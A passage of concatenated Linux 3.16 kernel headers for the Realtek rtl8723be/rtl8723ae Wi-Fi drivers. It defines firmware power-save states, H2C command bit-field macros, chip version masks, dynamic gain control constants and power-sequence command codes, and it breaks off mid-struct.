#define FW_8192C_POLLING_TIMEOUT_COUNT 6000
#define IS_FW_HEADER_EXIST(_pfwhdr) \
((_pfwhdr->signature&0xFFF0) == 0x5300)
#define USE_OLD_WOWLAN_DEBUG_FW 0
#define H2C_8723BE_RSVDPAGE_LOC_LEN 5
#define H2C_8723BE_PWEMODE_LENGTH 5
#define H2C_8723BE_JOINBSSRPT_LENGTH 1
#define H2C_8723BE_AP_OFFLOAD_LENGTH 3
#define H2C_8723BE_WOWLAN_LENGTH 3
#define H2C_8723BE_KEEP_ALIVE_CTRL_LENGTH 3
#if (USE_OLD_WOWLAN_DEBUG_FW == 0)
#define H2C_8723BE_REMOTE_WAKE_CTRL_LEN 1
#else
#define H2C_8723BE_REMOTE_WAKE_CTRL_LEN 3
#endif
#define H2C_8723BE_AOAC_GLOBAL_INFO_LEN 2
#define H2C_8723BE_AOAC_RSVDPAGE_LOC_LEN 7
/* Fw PS state for RPWM.
*BIT[2:0] = HW state
*BIT[3] = Protocol PS state, 1: register active state , 0: register sleep state
*BIT[4] = sub-state
*/
#define FW_PS_GO_ON BIT(0)
#define FW_PS_TX_NULL BIT(1)
#define FW_PS_RF_ON BIT(2)
#define FW_PS_REGISTER_ACTIVE BIT(3)
#define FW_PS_DPS BIT(0)
#define FW_PS_LCLK (FW_PS_DPS)
#define FW_PS_RF_OFF BIT(1)
#define FW_PS_ALL_ON BIT(2)
#define FW_PS_ST_ACTIVE BIT(3)
#define FW_PS_ISR_ENABLE BIT(4)
#define FW_PS_IMR_ENABLE BIT(5)
#define FW_PS_ACK BIT(6)
#define FW_PS_TOGGLE BIT(7)
/* 88E RPWM value*/
/* BIT[0] = 1: 32k, 0: 40M*/
#define FW_PS_CLOCK_OFF BIT(0) /* 32k*/
#define FW_PS_CLOCK_ON 0 /*40M*/
#define FW_PS_STATE_MASK (0x0F)
#define FW_PS_STATE_HW_MASK (0x07)
/*ISR_ENABLE, IMR_ENABLE, and PS mode should be inherited.*/
#define FW_PS_STATE_INT_MASK (0x3F)
#define FW_PS_STATE(x) (FW_PS_STATE_MASK & (x))
#define FW_PS_STATE_HW(x) (FW_PS_STATE_HW_MASK & (x))
#define FW_PS_STATE_INT(x) (FW_PS_STATE_INT_MASK & (x))
#define FW_PS_ISR_VAL(x) ((x) & 0x70)
#define FW_PS_IMR_MASK(x) ((x) & 0xDF)
#define FW_PS_KEEP_IMR(x) ((x) & 0x20)
#define FW_PS_STATE_S0 (FW_PS_DPS)
#define FW_PS_STATE_S1 (FW_PS_LCLK)
#define FW_PS_STATE_S2 (FW_PS_RF_OFF)
#define FW_PS_STATE_S3 (FW_PS_ALL_ON)
#define FW_PS_STATE_S4 ((FW_PS_ST_ACTIVE) | (FW_PS_ALL_ON))
/* ((FW_PS_RF_ON) | (FW_PS_REGISTER_ACTIVE))*/
#define FW_PS_STATE_ALL_ON_88E (FW_PS_CLOCK_ON)
/* (FW_PS_RF_ON)*/
#define FW_PS_STATE_RF_ON_88E (FW_PS_CLOCK_ON)
/* 0x0*/
#define FW_PS_STATE_RF_OFF_88E (FW_PS_CLOCK_ON)
/* (FW_PS_STATE_RF_OFF)*/
#define FW_PS_STATE_RF_OFF_LOW_PWR_88E (FW_PS_CLOCK_OFF)
#define FW_PS_STATE_ALL_ON_92C (FW_PS_STATE_S4)
#define FW_PS_STATE_RF_ON_92C (FW_PS_STATE_S3)
#define FW_PS_STATE_RF_OFF_92C (FW_PS_STATE_S2)
#define FW_PS_STATE_RF_OFF_LOW_PWR_92C (FW_PS_STATE_S1)
/* For 88E H2C PwrMode Cmd ID 5.*/
#define FW_PWR_STATE_ACTIVE ((FW_PS_RF_ON) | (FW_PS_REGISTER_ACTIVE))
#define FW_PWR_STATE_RF_OFF 0
#define FW_PS_IS_ACK(x) ((x) & FW_PS_ACK)
#define FW_PS_IS_CLK_ON(x) ((x) & (FW_PS_RF_OFF | FW_PS_ALL_ON))
#define FW_PS_IS_RF_ON(x) ((x) & (FW_PS_ALL_ON))
#define FW_PS_IS_ACTIVE(x) ((x) & (FW_PS_ST_ACTIVE))
#define FW_PS_IS_CPWM_INT(x) ((x) & 0x40)
#define FW_CLR_PS_STATE(x) ((x) = ((x) & (0xF0)))
#define IS_IN_LOW_POWER_STATE_88E(fwpsstate) \
(FW_PS_STATE(fwpsstate) == FW_PS_CLOCK_OFF)
#define FW_PWR_STATE_ACTIVE ((FW_PS_RF_ON) | (FW_PS_REGISTER_ACTIVE))
#define FW_PWR_STATE_RF_OFF 0
#define pagenum_128(_len) (u32)(((_len)>>7) + ((_len)&0x7F ? 1 : 0))
#define SET_88E_H2CCMD_WOWLAN_FUNC_ENABLE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_PATTERN_MATCH_ENABLE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 1, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_MAGIC_PKT_ENABLE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 2, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_UNICAST_PKT_ENABLE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 3, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_ALL_PKT_DROP(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 4, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_GPIO_ACTIVE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 5, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_REKEY_WAKE_UP(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 6, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_DISCONNECT_WAKE_UP(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 7, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_GPIONUM(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
#define SET_88E_H2CCMD_WOWLAN_GPIO_DURATION(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val)
#define SET_H2CCMD_PWRMODE_PARM_MODE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val)
#define SET_H2CCMD_PWRMODE_PARM_RLBM(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 4, __val)
#define SET_H2CCMD_PWRMODE_PARM_SMART_PS(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 4, 4, __val)
#define SET_H2CCMD_PWRMODE_PARM_AWAKE_INTERVAL(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val)
#define SET_H2CCMD_PWRMODE_PARM_ALL_QUEUE_UAPSD(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+3, 0, 8, __val)
#define SET_H2CCMD_PWRMODE_PARM_PWR_STATE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+4, 0, 8, __val)
#define GET_88E_H2CCMD_PWRMODE_PARM_MODE(__ph2ccmd) \
LE_BITS_TO_1BYTE(__ph2ccmd, 0, 8)
#define SET_H2CCMD_JOINBSSRPT_PARM_OPMODE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val)
#define SET_H2CCMD_RSVDPAGE_LOC_PROBE_RSP(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val)
#define SET_H2CCMD_RSVDPAGE_LOC_PSPOLL(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
#define SET_H2CCMD_RSVDPAGE_LOC_NULL_DATA(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val)
/* AP_OFFLOAD */
#define SET_H2CCMD_AP_OFFLOAD_ON(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val)
#define SET_H2CCMD_AP_OFFLOAD_HIDDEN(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
#define SET_H2CCMD_AP_OFFLOAD_DENYANY(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val)
#define SET_H2CCMD_AP_OFFLOAD_WAKEUP_EVT_RPT(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+3, 0, 8, __val)
/* Keep Alive Control*/
#define SET_88E_H2CCMD_KEEP_ALIVE_ENABLE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 1, __val)
#define SET_88E_H2CCMD_KEEP_ALIVE_ACCPEPT_USER_DEFINED(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 1, 1, __val)
#define SET_88E_H2CCMD_KEEP_ALIVE_PERIOD(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
/*REMOTE_WAKE_CTRL */
#define SET_88E_H2CCMD_REMOTE_WAKE_CTRL_EN(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 1, __val)
#if (USE_OLD_WOWLAN_DEBUG_FW == 0)
#define SET_88E_H2CCMD_REMOTE_WAKE_CTRL_ARP_OFFLOAD_EN(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 1, 1, __val)
#define SET_88E_H2CCMD_REMOTE_WAKE_CTRL_NDP_OFFLOAD_EN(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 2, 1, __val)
#define SET_88E_H2CCMD_REMOTE_WAKE_CTRL_GTK_OFFLOAD_EN(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 3, 1, __val)
#else
#define SET_88E_H2CCMD_REMOTE_WAKE_CTRL_PAIRWISE_ENC_ALG(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
#define SET_88E_H2CCMD_REMOTE_WAKE_CTRL_GROUP_ENC_ALG(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val)
#endif
/* GTK_OFFLOAD */
#define SET_88E_H2CCMD_AOAC_GLOBAL_INFO_PAIRWISE_ENC_ALG(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val)
#define SET_88E_H2CCMD_AOAC_GLOBAL_INFO_GROUP_ENC_ALG(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
/* AOAC_RSVDPAGE_LOC */
#define SET_88E_H2CCMD_AOAC_RSVDPAGE_LOC_REM_WAKE_CTRL_INFO(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE((__ph2ccmd), 0, 8, __val)
#define SET_88E_H2CCMD_AOAC_RSVDPAGE_LOC_ARP_RSP(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
#define SET_88E_H2CCMD_AOAC_RSVDPAGE_LOC_NEIGHBOR_ADV(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val)
#define SET_88E_H2CCMD_AOAC_RSVDPAGE_LOC_GTK_RSP(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+3, 0, 8, __val)
#define SET_88E_H2CCMD_AOAC_RSVDPAGE_LOC_GTK_INFO(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+4, 0, 8, __val)
void rtl8723be_set_fw_pwrmode_cmd(struct ieee80211_hw *hw, u8 mode);
void rtl8723be_set_fw_ap_off_load_cmd(struct ieee80211_hw *hw,
u8 ap_offload_enable);
void rtl8723be_fill_h2c_cmd(struct ieee80211_hw *hw, u8 element_id,
u32 cmd_len, u8 *p_cmdbuffer);
void rtl8723be_firmware_selfreset(struct ieee80211_hw *hw);
void rtl8723be_set_fw_rsvdpagepkt(struct ieee80211_hw *hw,
bool dl_finished);
void rtl8723be_set_fw_joinbss_report_cmd(struct ieee80211_hw *hw, u8 mstatus);
int rtl8723be_download_fw(struct ieee80211_hw *hw,
bool buse_wake_on_wlan_fw);
void rtl8723be_set_p2p_ps_offload_cmd(struct ieee80211_hw *hw,
u8 p2p_ps_state);
#endif
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723be/def.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#ifndef __RTL8723BE_DEF_H__
#define __RTL8723BE_DEF_H__
#define HAL_RETRY_LIMIT_INFRA 48
#define HAL_RETRY_LIMIT_AP_ADHOC 7
#define RESET_DELAY_8185 20
#define RT_IBSS_INT_MASKS (IMR_BCNINT | IMR_TBDOK | IMR_TBDER)
#define RT_AC_INT_MASKS (IMR_VIDOK | IMR_VODOK | IMR_BEDOK|IMR_BKDOK)
#define NUM_OF_FIRMWARE_QUEUE 10
#define NUM_OF_PAGES_IN_FW 0x100
#define NUM_OF_PAGE_IN_FW_QUEUE_BK 0x07
#define NUM_OF_PAGE_IN_FW_QUEUE_BE 0x07
#define NUM_OF_PAGE_IN_FW_QUEUE_VI 0x07
#define NUM_OF_PAGE_IN_FW_QUEUE_VO 0x07
#define NUM_OF_PAGE_IN_FW_QUEUE_HCCA 0x0
#define NUM_OF_PAGE_IN_FW_QUEUE_CMD 0x0
#define NUM_OF_PAGE_IN_FW_QUEUE_MGNT 0x02
#define NUM_OF_PAGE_IN_FW_QUEUE_HIGH 0x02
#define NUM_OF_PAGE_IN_FW_QUEUE_BCN 0x2
#define NUM_OF_PAGE_IN_FW_QUEUE_PUB 0xA1
#define NUM_OF_PAGE_IN_FW_QUEUE_BK_DTM 0x026
#define NUM_OF_PAGE_IN_FW_QUEUE_BE_DTM 0x048
#define NUM_OF_PAGE_IN_FW_QUEUE_VI_DTM 0x048
#define NUM_OF_PAGE_IN_FW_QUEUE_VO_DTM 0x026
#define NUM_OF_PAGE_IN_FW_QUEUE_PUB_DTM 0x00
#define MAX_LINES_HWCONFIG_TXT 1000
#define MAX_BYTES_LINE_HWCONFIG_TXT 256
#define SW_THREE_WIRE 0
#define HW_THREE_WIRE 2
#define BT_DEMO_BOARD 0
#define BT_QA_BOARD 1
#define BT_FPGA 2
#define HAL_PRIME_CHNL_OFFSET_DONT_CARE 0
#define HAL_PRIME_CHNL_OFFSET_LOWER 1
#define HAL_PRIME_CHNL_OFFSET_UPPER 2
#define MAX_H2C_QUEUE_NUM 10
#define RX_MPDU_QUEUE 0
#define RX_CMD_QUEUE 1
#define RX_MAX_QUEUE 2
#define AC2QUEUEID(_AC) (_AC)
#define C2H_RX_CMD_HDR_LEN 8
#define GET_C2H_CMD_CMD_LEN(__prxhdr) \
LE_BITS_TO_4BYTE((__prxhdr), 0, 16)
#define GET_C2H_CMD_ELEMENT_ID(__prxhdr) \
LE_BITS_TO_4BYTE((__prxhdr), 16, 8)
#define GET_C2H_CMD_CMD_SEQ(__prxhdr) \
LE_BITS_TO_4BYTE((__prxhdr), 24, 7)
#define GET_C2H_CMD_CONTINUE(__prxhdr) \
LE_BITS_TO_4BYTE((__prxhdr), 31, 1)
#define GET_C2H_CMD_CONTENT(__prxhdr) \
((u8 *)(__prxhdr) + C2H_RX_CMD_HDR_LEN)
#define GET_C2H_CMD_FEEDBACK_ELEMENT_ID(__pcmdfbhdr) \
LE_BITS_TO_4BYTE((__pcmdfbhdr), 0, 8)
#define GET_C2H_CMD_FEEDBACK_CCX_LEN(__pcmdfbhdr) \
LE_BITS_TO_4BYTE((__pcmdfbhdr), 8, 8)
#define GET_C2H_CMD_FEEDBACK_CCX_CMD_CNT(__pcmdfbhdr) \
LE_BITS_TO_4BYTE((__pcmdfbhdr), 16, 16)
#define GET_C2H_CMD_FEEDBACK_CCX_MAC_ID(__pcmdfbhdr) \
LE_BITS_TO_4BYTE(((__pcmdfbhdr) + 4), 0, 5)
#define GET_C2H_CMD_FEEDBACK_CCX_VALID(__pcmdfbhdr) \
LE_BITS_TO_4BYTE(((__pcmdfbhdr) + 4), 7, 1)
#define GET_C2H_CMD_FEEDBACK_CCX_RETRY_CNT(__pcmdfbhdr) \
LE_BITS_TO_4BYTE(((__pcmdfbhdr) + 4), 8, 5)
#define GET_C2H_CMD_FEEDBACK_CCX_TOK(__pcmdfbhdr) \
LE_BITS_TO_4BYTE(((__pcmdfbhdr) + 4), 15, 1)
#define GET_C2H_CMD_FEEDBACK_CCX_QSEL(__pcmdfbhdr) \
LE_BITS_TO_4BYTE(((__pcmdfbhdr) + 4), 16, 4)
#define GET_C2H_CMD_FEEDBACK_CCX_SEQ(__pcmdfbhdr) \
LE_BITS_TO_4BYTE(((__pcmdfbhdr) + 4), 20, 12)
#define CHIP_BONDING_IDENTIFIER(_value) (((_value)>>22)&0x3)
#define CHIP_BONDING_92C_1T2R 0x1
#define CHIP_8723 BIT(0)
#define CHIP_8723B (BIT(1) | BIT(2))
#define NORMAL_CHIP BIT(3)
#define RF_TYPE_1T1R (~(BIT(4) | BIT(5) | BIT(6)))
#define RF_TYPE_1T2R BIT(4)
#define RF_TYPE_2T2R BIT(5)
#define CHIP_VENDOR_UMC BIT(7)
#define B_CUT_VERSION BIT(12)
#define C_CUT_VERSION BIT(13)
#define D_CUT_VERSION ((BIT(12) | BIT(13)))
#define E_CUT_VERSION BIT(14)
#define RF_RL_ID (BIT(31) | BIT(30) | BIT(29) | BIT(28))
/* MASK */
#define IC_TYPE_MASK (BIT(0) | BIT(1) | BIT(2))
#define CHIP_TYPE_MASK BIT(3)
#define RF_TYPE_MASK (BIT(4) | BIT(5) | BIT(6))
#define MANUFACTUER_MASK BIT(7)
#define ROM_VERSION_MASK (BIT(11) | BIT(10) | BIT(9) | BIT(8))
#define CUT_VERSION_MASK (BIT(15) | BIT(14) | BIT(13) | BIT(12))
/* Get element */
#define GET_CVID_IC_TYPE(version) ((version) & IC_TYPE_MASK)
#define GET_CVID_CHIP_TYPE(version) ((version) & CHIP_TYPE_MASK)
#define GET_CVID_RF_TYPE(version) ((version) & RF_TYPE_MASK)
#define GET_CVID_MANUFACTUER(version) ((version) & MANUFACTUER_MASK)
#define GET_CVID_ROM_VERSION(version) ((version) & ROM_VERSION_MASK)
#define GET_CVID_CUT_VERSION(version) ((version) & CUT_VERSION_MASK)
#define IS_92C_SERIAL(version) ((IS_81XXC(version) && IS_2T2R(version)) ?\
true : false)
#define IS_81XXC(version) ((GET_CVID_IC_TYPE(version) == 0) ?\
true : false)
#define IS_8723_SERIES(version) ((GET_CVID_IC_TYPE(version) == CHIP_8723) ?\
true : false)
#define IS_1T1R(version) ((GET_CVID_RF_TYPE(version)) ? false : true)
#define IS_1T2R(version) ((GET_CVID_RF_TYPE(version) == RF_TYPE_1T2R)\
? true : false)
#define IS_2T2R(version) ((GET_CVID_RF_TYPE(version) == RF_TYPE_2T2R)\
? true : false)
enum rf_optype {
RF_OP_BY_SW_3WIRE = 0,
RF_OP_BY_FW,
RF_OP_MAX
};
enum rf_power_state {
RF_ON,
RF_OFF,
RF_SLEEP,
RF_SHUT_DOWN,
};
enum power_save_mode {
POWER_SAVE_MODE_ACTIVE,
POWER_SAVE_MODE_SAVE,
};
enum power_polocy_config {
POWERCFG_MAX_POWER_SAVINGS,
POWERCFG_GLOBAL_POWER_SAVINGS,
POWERCFG_LOCAL_POWER_SAVINGS,
POWERCFG_LENOVO,
};
enum interface_select_pci {
INTF_SEL1_MINICARD = 0,
INTF_SEL0_PCIE = 1,
INTF_SEL2_RSV = 2,
INTF_SEL3_RSV = 3,
};
enum rtl_desc_qsel {
QSLT_BK = 0x2,
QSLT_BE = 0x0,
QSLT_VI = 0x5,
QSLT_VO = 0x7,
QSLT_BEACON = 0x10,
QSLT_HIGH = 0x11,
QSLT_MGNT = 0x12,
QSLT_CMD = 0x13,
};
enum rtl_desc8723e_rate {
DESC92C_RATE1M = 0x00,
DESC92C_RATE2M = 0x01,
DESC92C_RATE5_5M = 0x02,
DESC92C_RATE11M = 0x03,
DESC92C_RATE6M = 0x04,
DESC92C_RATE9M = 0x05,
DESC92C_RATE12M = 0x06,
DESC92C_RATE18M = 0x07,
DESC92C_RATE24M = 0x08,
DESC92C_RATE36M = 0x09,
DESC92C_RATE48M = 0x0a,
DESC92C_RATE54M = 0x0b,
DESC92C_RATEMCS0 = 0x0c,
DESC92C_RATEMCS1 = 0x0d,
DESC92C_RATEMCS2 = 0x0e,
DESC92C_RATEMCS3 = 0x0f,
DESC92C_RATEMCS4 = 0x10,
DESC92C_RATEMCS5 = 0x11,
DESC92C_RATEMCS6 = 0x12,
DESC92C_RATEMCS7 = 0x13,
DESC92C_RATEMCS8 = 0x14,
DESC92C_RATEMCS9 = 0x15,
DESC92C_RATEMCS10 = 0x16,
DESC92C_RATEMCS11 = 0x17,
DESC92C_RATEMCS12 = 0x18,
DESC92C_RATEMCS13 = 0x19,
DESC92C_RATEMCS14 = 0x1a,
DESC92C_RATEMCS15 = 0x1b,
DESC92C_RATEMCS15_SG = 0x1c,
DESC92C_RATEMCS32 = 0x20,
};
enum rx_packet_type {
NORMAL_RX,
TX_REPORT1,
TX_REPORT2,
HIS_REPORT,
};
struct phy_sts_cck_8723e_t {
u8 adc_pwdb_X[4];
u8 sq_rpt;
u8 cck_agc_rpt;
};
struct h2c_cmd_8723e {
u8 element_id;
u32 cmd_len;
u8 *p_cmdbuffer;
};
#endif
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723ae/dm.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2012 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along with
* this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110, USA
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
****************************************************************************
*/
#ifndef __RTL8723E_DM_H__
#define __RTL8723E_DM_H__
#define HAL_DM_HIPWR_DISABLE BIT(1)
#define OFDM_TABLE_SIZE 37
#define CCK_TABLE_SIZE 33
#define DM_DIG_THRESH_HIGH 40
#define DM_DIG_THRESH_LOW 35
#define DM_FALSEALARM_THRESH_LOW 400
#define DM_FALSEALARM_THRESH_HIGH 1000
#define DM_DIG_MAX 0x3e
#define DM_DIG_MIN 0x1e
#define DM_DIG_FA_UPPER 0x32
#define DM_DIG_FA_LOWER 0x20
#define DM_DIG_FA_TH0 0x20
#define DM_DIG_FA_TH1 0x100
#define DM_DIG_FA_TH2 0x200
#define DM_DIG_BACKOFF_MAX 12
#define DM_DIG_BACKOFF_MIN -4
#define DM_DIG_BACKOFF_DEFAULT 10
#define RXPATHSELECTION_SS_TH_LOW 30
#define RXPATHSELECTION_DIFF_TH 18
#define DM_RATR_STA_INIT 0
#define DM_RATR_STA_HIGH 1
#define DM_RATR_STA_MIDDLE 2
#define DM_RATR_STA_LOW 3
#define TXHIGHPWRLEVEL_NORMAL 0
#define TXHIGHPWRLEVEL_LEVEL1 1
#define TXHIGHPWRLEVEL_LEVEL2 2
#define TXHIGHPWRLEVEL_BT1 3
#define TXHIGHPWRLEVEL_BT2 4
#define DM_TYPE_BYDRIVER 1
#define TX_POWER_NEAR_FIELD_THRESH_LVL2 74
#define TX_POWER_NEAR_FIELD_THRESH_LVL1 67
struct swat_t {
u8 failure_cnt;
u8 try_flag;
u8 stop_trying;
long pre_rssi;
long trying_threshold;
u8 cur_antenna;
u8 pre_antenna;
};
enum tag_dynamic_init_gain_operation_type_definition {
DIG_TYPE_THRESH_HIGH = 0,
DIG_TYPE_THRESH_LOW = 1,
DIG_TYPE_BACKOFF = 2,
DIG_TYPE_RX_GAIN_MIN = 3,
DIG_TYPE_RX_GAIN_MAX = 4,
DIG_TYPE_ENABLE = 5,
DIG_TYPE_DISABLE = 6,
DIG_OP_TYPE_MAX
};
enum tag_cck_packet_detection_threshold_type_definition {
CCK_PD_STAGE_LowRssi = 0,
CCK_PD_STAGE_HighRssi = 1,
CCK_FA_STAGE_Low = 2,
CCK_FA_STAGE_High = 3,
CCK_PD_STAGE_MAX = 4,
};
enum dm_1r_cca_e {
CCA_1R = 0,
CCA_2R = 1,
CCA_MAX = 2,
};
enum dm_rf_e {
RF_SAVE = 0,
RF_NORMAL = 1,
RF_MAX = 2,
};
enum dm_sw_ant_switch_e {
ANS_ANTENNA_B = 1,
ANS_ANTENNA_A = 2,
ANS_ANTENNA_MAX = 3,
};
enum dm_dig_ext_port_alg_e {
DIG_EXT_PORT_STAGE_0 = 0,
DIG_EXT_PORT_STAGE_1 = 1,
DIG_EXT_PORT_STAGE_2 = 2,
DIG_EXT_PORT_STAGE_3 = 3,
DIG_EXT_PORT_STAGE_MAX = 4,
};
enum dm_dig_connect_e {
DIG_STA_DISCONNECT = 0,
DIG_STA_CONNECT = 1,
DIG_STA_BEFORE_CONNECT = 2,
DIG_MULTISTA_DISCONNECT = 3,
DIG_MULTISTA_CONNECT = 4,
DIG_CONNECT_MAX
};
#define GET_UNDECORATED_AVERAGE_RSSI(_priv) \
((((struct rtl_priv *)(_priv))->mac80211.opmode == \
NL80211_IFTYPE_ADHOC) ? \
(((struct rtl_priv *)(_priv))->dm.entry_min_undec_sm_pwdb) \
: (((struct rtl_priv *)(_priv))->dm.undec_sm_pwdb))
void rtl8723ae_dm_init(struct ieee80211_hw *hw);
void rtl8723ae_dm_watchdog(struct ieee80211_hw *hw);
void rtl8723ae_dm_write_dig(struct ieee80211_hw *hw);
void rtl8723ae_dm_init_rate_adaptive_mask(struct ieee80211_hw *hw);
void rtl8723ae_dm_rf_saving(struct ieee80211_hw *hw, u8 bforce_in_normal);
void rtl8723ae_dm_bt_coexist(struct ieee80211_hw *hw);
#endif
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723be/pwrseqcmd.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#ifndef __RTL8723BE_PWRSEQCMD_H__
#define __RTL8723BE_PWRSEQCMD_H__
#include "../wifi.h"
/*---------------------------------------------*/
/*The value of cmd: 4 bits */
/*---------------------------------------------*/
#define PWR_CMD_READ 0x00
#define PWR_CMD_WRITE 0x01
#define PWR_CMD_POLLING 0x02
#define PWR_CMD_DELAY 0x03
#define PWR_CMD_END 0x04
/* define the base address of each block */
#define PWR_BASEADDR_MAC 0x00
#define PWR_BASEADDR_USB 0x01
#define PWR_BASEADDR_PCIE 0x02
#define PWR_BASEADDR_SDIO 0x03
#define PWR_INTF_SDIO_MSK BIT(0)
#define PWR_INTF_USB_MSK BIT(1)
#define PWR_INTF_PCI_MSK BIT(2)
#define PWR_INTF_ALL_MSK (BIT(0) | BIT(1) | BIT(2) | BIT(3))
#define PWR_FAB_TSMC_MSK BIT(0)
#define PWR_FAB_UMC_MSK BIT(1)
#define PWR_FAB_ALL_MSK (BIT(0) | BIT(1) | BIT(2) | BIT(3))
#define PWR_CUT_TESTCHIP_MSK BIT(0)
#define PWR_CUT_A_MSK BIT(1)
#define PWR_CUT_B_MSK BIT(2)
#define PWR_CUT_C_MSK BIT(3)
#define PWR_CUT_D_MSK BIT(4)
#define PWR_CUT_E_MSK BIT(5)
#define PWR_CUT_F_MSK BIT(6)
#define PWR_CUT_G_MSK BIT(7)
#define PWR_CUT_ALL_MSK 0xFF
enum pwrseq_delay_unit {
PWRSEQ_DELAY_US,
PWRSEQ_DELAY_MS,
};
struct wlan_pwr_cfg {
